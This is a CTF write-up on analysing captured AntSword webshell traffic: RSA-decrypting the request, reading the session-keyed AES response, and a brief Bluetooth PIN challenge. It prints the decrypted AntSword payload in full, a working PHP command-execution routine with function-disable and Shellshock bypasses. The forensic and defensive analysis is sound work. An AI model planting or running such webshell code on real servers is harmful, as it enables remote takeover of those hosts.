Anheng Monthly CTF: Traffic Analysis

After an afternoon of work I finally figured out the awdshell challenge; here is the approach.

References:

https://xz.aliyun.com/t/6701
https://mp.weixin.qq.com/s?__biz=MzI0MDI5MTQ3OQ==&mid=2247483852&idx=1&sn=3cd3f667523550d414fad97231eeeaea&chksm=e91c5a34de6bd3223f5c3e69aa12311be39d4c13ee8d222ddb81f97070c74698dc7ae7fcecba&mpshare=1&scene=23&srcid&sharer_sharetime=1572778022447&sharer_shareid=3bdf1b0c76d4c1691e700c57f87d9c0a%23rd
Knowledge used: PHP OpenSSL, capturing local traffic with Wireshark (npcap), AES, Wireshark traffic analysis and display-filter syntax, AntSword's RSA encoder.

Solution

Exporting HTTP objects

The first routine step is to export the HTTP objects. There is an upload.php, through which an unfamiliar webshell was uploaded; the shell contains a public key, so RSA encryption is the obvious candidate.

So it is certain that a webshell was uploaded, and the analysis should focus on the interaction with that shell.

Traffic analysis

By filtering the packets I determined that the uploaded file was saved as 1581335771.php, so I concentrated on the interactions with that file in the capture.
Display filter used: http and ip.dst==139.224.112.182 and http.request.method==POST

Follow each HTTP stream one by one and see whether there is anything useful.
While following packet 29543 I found the string L3Zhci93d3cvaHRtbC9hZG1pbi91cGxvYWQv, which looks like base64; decoding it gives /var/www/html/admin/upload/, presumably the upload path.
Following the remaining HTTP streams one at a time, the returned data is all encrypted and nothing useful comes from the responses for now, so I kept looking at the sent data.
While following the second-to-last HTTP stream I found a clue: the sent data contains Y2QgIi92YXIvd3d3L2h0bWwvYWRtaW4vdXBsb2FkIjtjYXQgZmxhZztlY2hvIFtTXTtwd2Q7ZWNobyBbRV0=, which decodes to cd "/var/www/html/admin/upload";cat flag;echo [S];pwd;echo [E]. The flag is probably hidden here, so the data sent in this request needs to be recovered.

Traffic recovery

Since there was a public key among the exported HTTP objects, asymmetric encryption (RSA) is the natural guess. Combined with the keyword ant given in the challenge and the format of the shell, it can be determined that the shell is being driven by AntSword and that the sent data is RSA-encrypted.
We can write a script to recover the sent data.

```php
<?php
// The '|'-separated RSA blocks taken from the POST body of the HTTP stream above
$ant="GmFJzJHcsMOZxeGvb3Ulf4Y8e5RRhttAV1bsfypbvQAJW8IRFcqDVoXtyiclZwz2qXdQN8ivFYNqNxhkwtjbB7OitVLgULBfWlOnwtufxvmbmO4u8WlINbPbf/DbAy0Qx3GjBMFpFzrCkKINOfWQ5JqSD1EPx6sM9Cu1VkX5nus=|nL6Ds9dWn+UW5Jb0JAhoTb4rqPJJKbgcPNJfXLP1AKPbWHVE0JFSjClsnXWmFPXfeqPdKqcYxb/14hEwFzs51N5f6+NowrGHjYT+ObPKXpYxzg0vkCMihUMA7DI2YPUWEyPdvoIFg/bW5S3MommwKN9epOto55dtq6Pnb8NEHzY=|S4ic8EaKa3zEkRd7qsTGDs7uf3qiU1UVZE4fheQz3iq1HkiY6rIvAdtvcmsBF5aJWjdA/U2py1Mz105F2Tzm4dDX2Ag/rhX4ysiP8NJDEp+I55R0dfJu6szTOr3O2OTaUQK7iSYT4PKHjdo+rgeHK3hWzzMFAs6i2R9E81vz9WE=|FNCwxF7bDPNgizk4oa7bq4xbIObNCZNYNBdrTLMbYegWZ6FVYi54TLuABR/nkDLXq38cT099hjajM4iY+VL4g8tBRP++4LyPcSyzyC6mDtshAlmQtFteq4sGb+3IilDPekURxQ5RodRGBPtHr+nCNICbgmbqNaYKcVJRfMoK3q8=|m+nGWL1bOFJzaYeT54FtW12U3dWPZk5PJa91+YTtLn9Wg1c8JEf0FzI+YlBtpp6pW0fT7FfbTiJhQsv3f97bb3d+Cs7A5dM/ZG5YXDoDHGhRJKw0+TTHRIm3PH4fnbQNI8zhi5+9t2+0ueujAuXkk8i73A4lH36uKJFloL6yqs8=|YsyuPkbRlpDWwjhlkTThQN9GQXGkkzyNSFoxs5IfsRbbO7ZHphlFhL4yYsRYAgp8MkMJ64x7NfIGoVgDJnA1YgORiJOf8GP/p/28MLOuscy1SVN/lLnJzbhmf/7vfg0/Q94QAEWk2TOgSil0h3JDsgQYqDtFFldHWDnqEvYlWZI=|C2ZaL3MQWCQBmNcq8xAxxlhvXzUxo0qBz2PUIqBIMcKNJ3sgxU+RTqSwYoqPTDAg3//7rNa+dkinRAidD8GjrcSBd5qdbTLQlWZGME9Lv6JEFt0udTU0FVrhV/ctPz+z1NN5P4pN1tj35sNKsyfYH1kq13A+3dYk0wZlMU9KIFI=|l65yWzb3A97Cdu0wdn59Hiag/Um4/LZTrolCjwo9d7/J3Z9stTkaEtLe2XBdVQZsipUfnW2o7JWgQNo0TUbGWIv2H5wKGaTfPm7OTSkm+ao48Nn1d/+yME+RLudQqbmYREMAJFviNJST+H4Q+MqyngjMeGrb5jmlw0eQZ/MUx5Q=|EYwu5Y3rgl8k2KrPZjnGPWjriLI1mDeJwA4KhjvJ4wQs9Xx+ITDsxBr0eMfL/Km95ykbfMlZcrSzonx5hLiE2YLwDjX/cIIZxqzZXkEYq00AdAPrFnhFVdvJn/SHQ1LdGHgAN88Y2EOZOPM8ZXima61BxCY44TlrezIbBj4+eQ0=|Z2/dEUju0jw63PMHCK9CAG+tHmwiH0t3GraGPCes4TZT5hIfv6kHMTOgMthTK6sd5qy+EVw6d1Qxh03WMHVH0gR2aYqEl1RdYwQpN0NPsSM+fETsag3nQ4oV3VniGlaMmdFIiYatNvKNl7tOcapklyxEEIA0Jc33O7FDjUXKiHU=|YEVG5OctKJXP1Z7kywDJGrmb7BvXW/C3iQudtTCLgUIbMhXFq90wLvW7No7ZoqhY/Mh1XlJKtkBZJWEbsORW23hxvA5LCb/edsfJmIxWtj5cRG9g66j3BiEUPDjvtYi6beUjUtKmuSInELTkmIKf1jo5qyZE+VcWC4HfAT0wbFw=|ii/O42J/+ko4xPNfNuunKR7gyji/wtaiMcKMzQM2Qg7KZE/+xAcLX3Znh55OwgsfaTX6AedF+L/1hwMp9zigbvXorSE0TNay//nVlcnhhC4snAu2/hjXNoI3OnnWlfFFLYOj5v+1LN1nCU/UzoHV6/w1/4bVz7Maovj14BfXklI=|eay1qqOy5QmJmStB9EH4JKPms1In5agVigegn5/1IZS+0QpBgK37mWg02rspbMz20brtSgsv2PhJ3gMTFg3ib7z0cQZPvcNV6DTZwSHbUO2M1uQetssYMMnBPPulwLhTkND4SzwSsgDLS6m8TxbHL0qpZRcnNo2sMy478S5DkvM=|e4qLRtta2W6ItXy3HNgpYuQuSSzpsvq+SUfoRKWM8Z5QdiBeleS/YDGP0VZqRJh3CPMC6vbegwB7qNLAt6czTsHQTdTAJBLr5g4oTDc9Sxlk8A7vvK0ljLSgKjNw5s3BDa03jINPkc5BbDkrTaXMq01Bqcu5DPTTA0pO/Z9oq1Q=|RBdZrEGknOK+PCuQ1F2eTxKvAi50XD/Z1ccAItPJ+48VlSbOTZa/wkdr82K8LE56z0E4JtZDBVSj9I4TurU2bbmfCjKXGw9xlagS7YMr/hfyCy/2hrVveAkaBZDAtmnrM4nGpFxVpzArl124XlqEzh9cSS9LAnwkNm8j05D6mDc=|aZpV5K4m1Rwxd/Y9eOfJ0bRpIZybj2tSjuAEJI7Il/EV9ZC0pXLIkgWviG40pXQFGoEwGex7f0j/Je4ldLRKnrpsyZ+/3mZtHnHL4gepf+iVaULQ8jdHTVVnM1t4qLJk+RnhYbuFjcUy5Yo6rn0Cju8sPIdpEwvi8fvetIOGVJE=|fPGROe6VaAwzqmNuk86fnWT4LqandXTwuewTC80zI8xTFSj1S6YMxPROTHS94gXlCcLTfFjEW2VpH2tyANX1FBIw5sSjsuS6CQKuqiQo6ID975H5Ox+KkJs6XLP/l5Or34U3rryHzBooTrXQlDl21qoPBLdj5URgGrEq7wrvLVA=|jp3lUm3Gz2eZpB5zghEGom2syK8nBymkc6h3pKE/mIS8KW6gD2OFSEneFERI0jy26kVOBhxr3ZHY3WoL6s5aJepTuY7D6Dpz/REI+FzR2PlCo0WvyLQdOphMgbYef1SyYr1+DWK/JxxFjxtfVRZlwL7+OyHQjQ05oVHyq6juSEI=|h8tsCCKgjChZ5U/sZxeVPiF8hO+cB6qqfeWnTAMydEcLmR0iwvHcarZw4g2WH2ASvwIN0av4GzLSu2QtOM1u0y/OuVX3v9/Vp+nNMZ/Dog0NUxFIPD1HTgaK3w7DdnA6B6i26JooWAxKlTFgYmr0x7K53pmM6B8wVQu/ADsbFBE=|CdejrTSVZhSgL+3bhPQyuL7ho71i+L8VvpwNg+D84YnKdwbbbfgqIMu+gefCBmyzvhbhEeGR16/T/fZ4bkneak+fzZpgUrejrFbOETG2Rg9zViznPwBdku9FTlWUybaRD0CHKeY7nE93/G2yXWSpuk/7P594cAPi1qd2WnEbaBc=|Hnxjy7ZSfmn6B59Kv7VXu1mhtYdgGbOtsLsLqDX6K1dKhtHsGx0guy03qwqRA0XElDdJ3Dvgqi5lgb8SY6MiDf1c9u870K8S9xVTn6Y0lbZgtvPoDrobEiT6tGEQCRsUuXB6jbUTgnNPmaDAuidQZqdsSBIGZwQyzycgxHmaDuE=|Imz1om4RRCU1Wnyowe5SYFtICyD1BODveyZ497yURKcyMgoogUxi0cPCiyexdD9ciNYk6DGyimegT7zMeIA5oGfNg2EHbzuBJeSc4wqLCJtSmTe66inu3dqC4IDxt2ghkgFLSQZWqNOKOgUt1b5wgy3O/Y3iIzS888TuFSDm+RQ=|jldlrb8EHvWiKi5E/HBIrn4UUnzMZO8+6ugZ7hjZTtWI5Vg9EeWdmITpEpOQIWIXpOUhaI+VydVcom8e7Fe6gR6u4RPy5ChmFgjZhT03gwwNXzJeiaE6x7ZZjXGBZA3Lwu5gRns3s+hTM0Tm2vrhGOQDB41hDDi4N/Yb3MRn0PM=|UJKgd4FCzzzMeQEq+w3S17+3d+g9mM3JM2qZWkWHOIF3L/EiWpRhm18DuaWJ7veqQSA5pb3KGH9rKDvj2KHIDTUHl0gCiH1U5qeD+WqXFvLahN5O8ecrfgflUUip1SdE6aL6dYqzyplxF+qy3BVr2dKq+6UYlUiA5Bmn2lXSIyM=|LClEAJBfCO7HMhlu0ASDbetkR7sP4aOx9a/P4P0L5kLeGYrlrK4Qg3ZNl7Fd/gQ8KXAKs90XRE62pfZidMX1A4xj/IokC6nkXCNUIzi0PWPWdCzcBNiswbQtsTZhElecl8RyfaOSvxsiKclTvKbZYfQI5r0p0asBs5gKnK0FpT4=|paMu+DWwNp+5GRSiGn4QfFaS/ffXXKuBgP/qzsixnnBWMeXIVy/HT23Xdoc7/OdlIH8/rBKdrJt+7o6XUAbRGzND9sEuf0Ldh5npWln/EhSkGq+bqt1hDfmwwsoo2GJcNDHBhz6lQq2M4zoa9E9d04T3N/SE+3B7LFb0cxLE8aA=|Cz+hQca9uYZJPPJusvE1G8X12VF5iPFM83nOnszF38XQziVKd+D83N4IvoJPNdJLEtgbycIpg1bo5auK1u9n2Pv8z1jFHoaTzmPgDBFiAAv3NGd0m2vg09QwRxq84PD9Ey0dwT7C1w2e6M9wGJ6DoIhPhZQgvUKMyrmCAVmMo18=|h59BqEgdFq4a1HegvdVKeMWwiwQMQsaSzYOxbNCiPuCRGknF8dHHkQboB65gnjbNBDPVpiVoDBMDV+1sCc1yM8zqC494bDS7iopf/U3BBnZS2wCxeo1x78DUiEgzP6ILomxrhrMY2y5R9IbmhJQVkpiqMhPaCvvHzOZO6Pz9SHg=|gUSFO4uVnPAI4UVTKCdBqH/rD6BZZFPfhsVOzga0ohjOJhXW+pvAu4GSh+3FIGn6cpxBUILbsLjBSgmscqAbKV/nHRnQ8HjQUgnu5YM8KikKJV35OMt1Mo1P/qlF5bwzI969XDtUHtClPkznXuO4HyvGLj0/mJj0IauhxfDKhyU=|jkhijGHqR86l+YGh7fldHrzLfam9LUYfRt2nrqqgeqCoE6KO8khatGkzLPk8QgIjLti6P6d7AwwPdVLX3gsfv6bBhT26qUR1u5+AA8foNt5tH6Ej33OODcnkxcp19eFu+zWRG1zUDkBs5qtCJvZKnpSPFKxJ6Z2g0RAoKF3pqbY=|QayQ2dVrEz8KBgpVQjGRNbpRHgFhVK3e89fEzEKzlclezrZ7CBgjB6/Y0PPYSIeZldFEZficAzHXs+bFHALEMrkJlRMk36FMuqtn0YVs4cVy8AHxjb8QnJD9gsFC6q2EWmRo8w4ZdBvg1xyeg3D0vhOcZgNk78BGoSU2HhHK5xY=|Ncgk0CAlnik6xDFINohB1EqgT7tS8COpia8O9cuvi53lNlQWY4IWG2oZMgzNWeU/m8QL+EGqhrD6IflJDD/hDO/IFC6D2DEjeMofqJ/6sHXAt2lIV129SeUUjGdrxyxeWDtqu6iBDdDBtyfPVfeI/DMYOh46XkR0Wk5nBU2N7+U=|lOxi5A2Z8sa8+aw5rQm0g6gqukXMlwvLV7ykEiGWFRqFqDaRPnkVI8diKsvgBg0Btk94gXt2FX1polSNgIJL3E6GW9loo2OMSGBBg1KJ/6VC/DpLWy44VbZhrUB//hiXo3xua6h2DRDi4h5eFkkf2ZIjGjZBi+AqHQINUbetN54=|DRBn6EF3Eoj+wpOX2xhKhkrypPB+d2+8PyHzXwKL8QmOeaRufeCZ1/7Id4TQPXiRXOYsPDXVLr1tUWAUNfqIQisGxSL8lAgg9LzYNYxRUejuTsP2WmVSO21cYXTPlNYjJDR+BkTtOlAvBBp3fjwhOVlr1khuzAhl2Y799drdSFk=|VIJ6dfEfxNcc1eWhAL0dMWXkGSCnBqv+I+Hqs7mGdK9CG3sMH1LyhIEsYg/UPccftYAPeIqKitOpj4OlNbGQMlf8AIJgFvNceAl7HCwqf/6ggZzfcBx5r4HpCBI3cB2zOOOlX9AFVRcunk3rCZSsaeQ8QGsLC1q/2EImzQqSB5g=";
// The public key exported from the HTTP objects (the one embedded in the uploaded shell)
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCmXoXBvXeanxgl51HBm2J6HPNh
TQtfb8ICioE+n0Ni0DlBFHSBprbsWYKJywVfdhJbLDCCon68uA1UYuy0yteDog3j
OdweW2bscEGmeMXLQJfBHpQrg4wWoYJjD3QsKorYT6kdp1LRkuHE3PbpqvRtqO7A
LzrcBi88Eu7oZaPANwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $ant);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
// Each block was encrypted with AntSword's private key, so the public key recovers it
foreach ($cmds as $value) {
    if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
        $cmd .= $de;
    }
}
print_r($cmd);
?>
```

The recovered data is:

```php
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){@session_start();$key=@substr(str_pad(session_id(),16,'a'),0,16);return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));};;function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f3c7239848e0";echo @asenc($output);echo "05fda2646c";}ob_start();try{$p=base64_decode($_POST["t185a78b977a47"]);$s=base64_decode($_POST["wd0b7c7ca226cb"]);$envstr=@base64_decode($_POST["b8dcb72ce2ba93"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";if(substr($d,0,1)=="/"){@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");}else{@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty($envstr)){$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);} else {mail("a@127.0.0.1", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c){$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join("
",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
```

Code audit

In this code there are two key functions: asenc() and asoutput(). The output is f3c7239848e0 + asenc($output) + 05fda2646c; inside asenc the data is encrypted with AES-128-ECB, and the key is the session id padded with 'a' to 16 characters and cut to its first 16 characters, so the session id just has to be found in the capture.

Data recovery

What remains is to recover the data. From the code audit we know that the content of base64(AES(base64(out))) is +L8pc9pJEhqPQ1cmL18eJXX9QGADkKnp8A1j7s4oX2Qo8YJNGNTbuaXu+OfynYgRewqyfLj/Wrg0rgKj/cRdO4zJMmfLfyFVB4pBRYeTetM0G/w/Px6+xI/WPlRrx/+MvK6eQyPr+xDqTX82AqiGrOYDwN94/vuGcLS7NAxhty4=
Decrypting it is all that is needed. Decryption method:

```php
<?php
$payload = base64_decode("+L8pc9pJEhqPQ1cmL18eJXX9QGADkKnp8A1j7s4oX2Qo8YJNGNTbuaXu+OfynYgRewqyfLj/Wrg0rgKj/cRdO4zJMmfLfyFVB4pBRYeTetM0G/w/Px6+xI/WPlRrx/+MvK6eQyPr+xDqTX82AqiGrOYDwN94/vuGcLS7NAxhty4=");
$k = substr(str_pad('PHPSESSID_FROM_PCAP', 16, 'a'), 0, 16); // placeholder: use the session id found in the capture
$res = openssl_decrypt($payload, 'AES-128-ECB', $k, OPENSSL_RAW_DATA); // yields base64($output)
echo base64_decode(base64_decode($res)); // asenc() base64-encoded the output, and the flag file is base64 too
```

Two more rounds of base64 decoding then give the flag. (The file read by cat flag is itself base64-encoded.)
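As an added example (not code from the writeup or from AntSword), the Python helpers below capture the traffic features this challenge turns on: they recognise the pipe-joined RSA-block format of the request body from the traffic-recovery step, derive the AES key from the session id the way asenc() does, and strip the asoutput() markers from a response as used in the data-recovery step. The marker values, the 128-byte block size and the response ciphertext come from the page; the request sample is constructed.

```python
import base64
import re

# Added helper functions, not code from the writeup or from AntSword itself.
# They recognise the two traffic shapes the capture above shows: an RSA-mode
# request body made of '|'-joined base64 blocks, and a response wrapped in
# the markers that asoutput() echoes around asenc($output).

RSA_KEY_BYTES = 128  # the public key in the capture is RSA-1024, so each block is 128 bytes
START_MARK, END_MARK = "f3c7239848e0", "05fda2646c"  # markers hard-coded in the decoded payload


def is_rsa_mode_body(body, key_bytes=RSA_KEY_BYTES):
    """True when every '|'-separated field is base64 of exactly one RSA block."""
    chunks = body.strip().split("|")
    if len(chunks) < 2:
        return False
    for chunk in chunks:
        try:
            raw = base64.b64decode(chunk, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            return False
        if len(raw) != key_bytes:
            return False
    return True


def session_key(session_id):
    """AES-128-ECB key exactly as asenc() derives it:
    str_pad(session_id, 16, 'a') pads on the right, then substr(..., 0, 16)."""
    return session_id.ljust(16, "a")[:16].encode("ascii")


def extract_response_cipher(body):
    """Return the raw AES ciphertext between the two markers, or None if absent.
    Decrypting it with AES-128-ECB under session_key() yields base64($output)."""
    m = re.search(re.escape(START_MARK) + r"([A-Za-z0-9+/=]+)" + re.escape(END_MARK), body)
    return base64.b64decode(m.group(1), validate=True) if m else None


# Constructed samples (not captured traffic): two all-zero RSA blocks joined by
# '|', and a response body carrying the ciphertext quoted in the writeup.
SAMPLE_REQUEST = "|".join([base64.b64encode(bytes(RSA_KEY_BYTES)).decode()] * 2)
SAMPLE_RESPONSE = (
    "<html>" + START_MARK
    + "+L8pc9pJEhqPQ1cmL18eJXX9QGADkKnp8A1j7s4oX2Qo8YJNGNTbuaXu+OfynYgRewqyfLj/Wrg0rgKj/cRdO4zJMmfLfyFVB4pBRYeTetM0G/w/Px6+xI/WPlRrx/+MvK6eQyPr+xDqTX82AqiGrOYDwN94/vuGcLS7NAxhty4="
    + END_MARK + "</html>"
)

if __name__ == "__main__":
    print(is_rsa_mode_body(SAMPLE_REQUEST), len(extract_response_cipher(SAMPLE_RESPONSE)))
```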

Challenge summary

This challenge was a bit of a pain, mainly because I was unfamiliar with AntSword's traffic characteristics. In AWD, shell evasion and WAFs are forever iterating against each other. There is still a lot to learn; one should analyse more traffic and summarise its features.

Bluetooth packets

When I first saw the Bluetooth challenge I had no idea where to start, since I had never studied Bluetooth protocols. So I learned a bit online, found the protocol used for the data transfer, searched for that protocol name and actually turned up a .7z file.
After finding it I imported the hex into 010 Editor to rebuild the .7z. It asked for a password; my first thought was fake encryption, but it wasn't that (360 actually repairs fake encryption automatically). Then the file name hinted that the password was the Bluetooth PIN,
so I searched the capture for "PIN".
On the first search I actually hit it... but didn't spot the PIN. Just as I was about to brute-force it (the PIN is all digits and short, easy to brute-force), a friend said "just search for PIN"... I... was speechless.
After finding the PIN, extracting the archive gives the flag.